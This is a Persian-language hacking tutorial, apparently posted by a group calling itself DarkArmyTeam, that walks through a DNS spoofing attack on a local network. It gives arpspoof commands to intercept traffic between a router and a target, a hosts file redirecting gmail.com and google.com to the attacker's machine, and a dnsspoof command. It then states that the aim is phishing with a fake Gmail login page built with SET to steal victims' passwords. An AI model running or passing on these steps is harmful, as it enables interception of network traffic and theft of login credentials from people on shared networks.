سلام به ستونای گنگ و بتونای سنگ مجازی :)
اومدم با به پست خفن که به امید خدا استارت شروع دوباره تیم باشه...
این پست بعد کامنت یکی از دوستان که دنبال مطالب لینوکسی میگشت به ذهنم رسید و گفتم بگم که شما هم استفاده کنید.
میدونم برای شما که توی این کارید خیلی مسخرهس ولی اول باید ببینیم dns چی هست؟
وقتی ما آدرس یک سایتو توی مرورگر وارد میکنیم در اصل داریم از سرورای dns که از قبل تعریف شده آی پی سایت رو گیر میاریم.
در اصل ما با آی پی به سایت دسترسی پیدا میکنیم.
بعد باید ببینیم حملات dns spoof یا آلوده سازی دیاناس چیه؟
در مرحله اول هنگام جستجو، دستگاهی که باهاش سرچ میکنید، دیاناس محلی(local) رو برای آی پی سایت سرچ میکنه و اگه نبود از دیاناسهای جهانی کمک میگیره. حالا ما با این حملات آدرس سایت رو با آدرس آی پی مد نظرمون توی دیاناس محلی ذخیره میکنیم.
یعنی آی پی خودمون رو با آی پی اصلی سایت عوض میکنیم :)
حالا کالی رو آتیش کنید و ترمینال رو باز کنید.
دستور ifconfig رو اجرا کنید و آیپی خودتون رو کپی کنید.
حالا دستورات زیر رو توی ترمینال خط به خط اجرا کنید (باید توی دو تا ترمینال متفاوت اجرا کنید. چون کدها تا وقتی تمومش نکنید اجرا میشن)
192.168.1.1 = ایپی روتر
192.168.1.100 = ایپی هدف
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
حالا یه فایل جدید متنی بسازید و اسمشو بزارید hosts.txt و کدهای زیر رو کپی کنید توش:
www.gmail.com 192.168.1.101حالا دستور زیر رو توی یه ترمینال جدید بنویسید:
www.google.com 192.168.1.101
dnsspoof -i eth0 -f hosts.txt
تموم!
اگه توی سیستم هدف از سایت جیمیل یا گوگل پینگ بگیرید بجای آیپی اصلی گوگل آیپی 192.168.1.101 رو میبینید :)
حالا شاید بگید به چه درد میخوره؟
از این حمله برای فیشینگ استفاده میشه.
مثلا میتونید با ابزار SET یه صفحه جعلی جیمیل درست کنید.
وقتی هدف آدرس جیمیل رو میزنه بجای ورود با جیمیل به صفحه فیشینگ ما وارد میشه و با زدن رمزش ما میتونیم اطلاعاتو کش بریم :)
we work in dark to serve light
we are DarkArmyTeam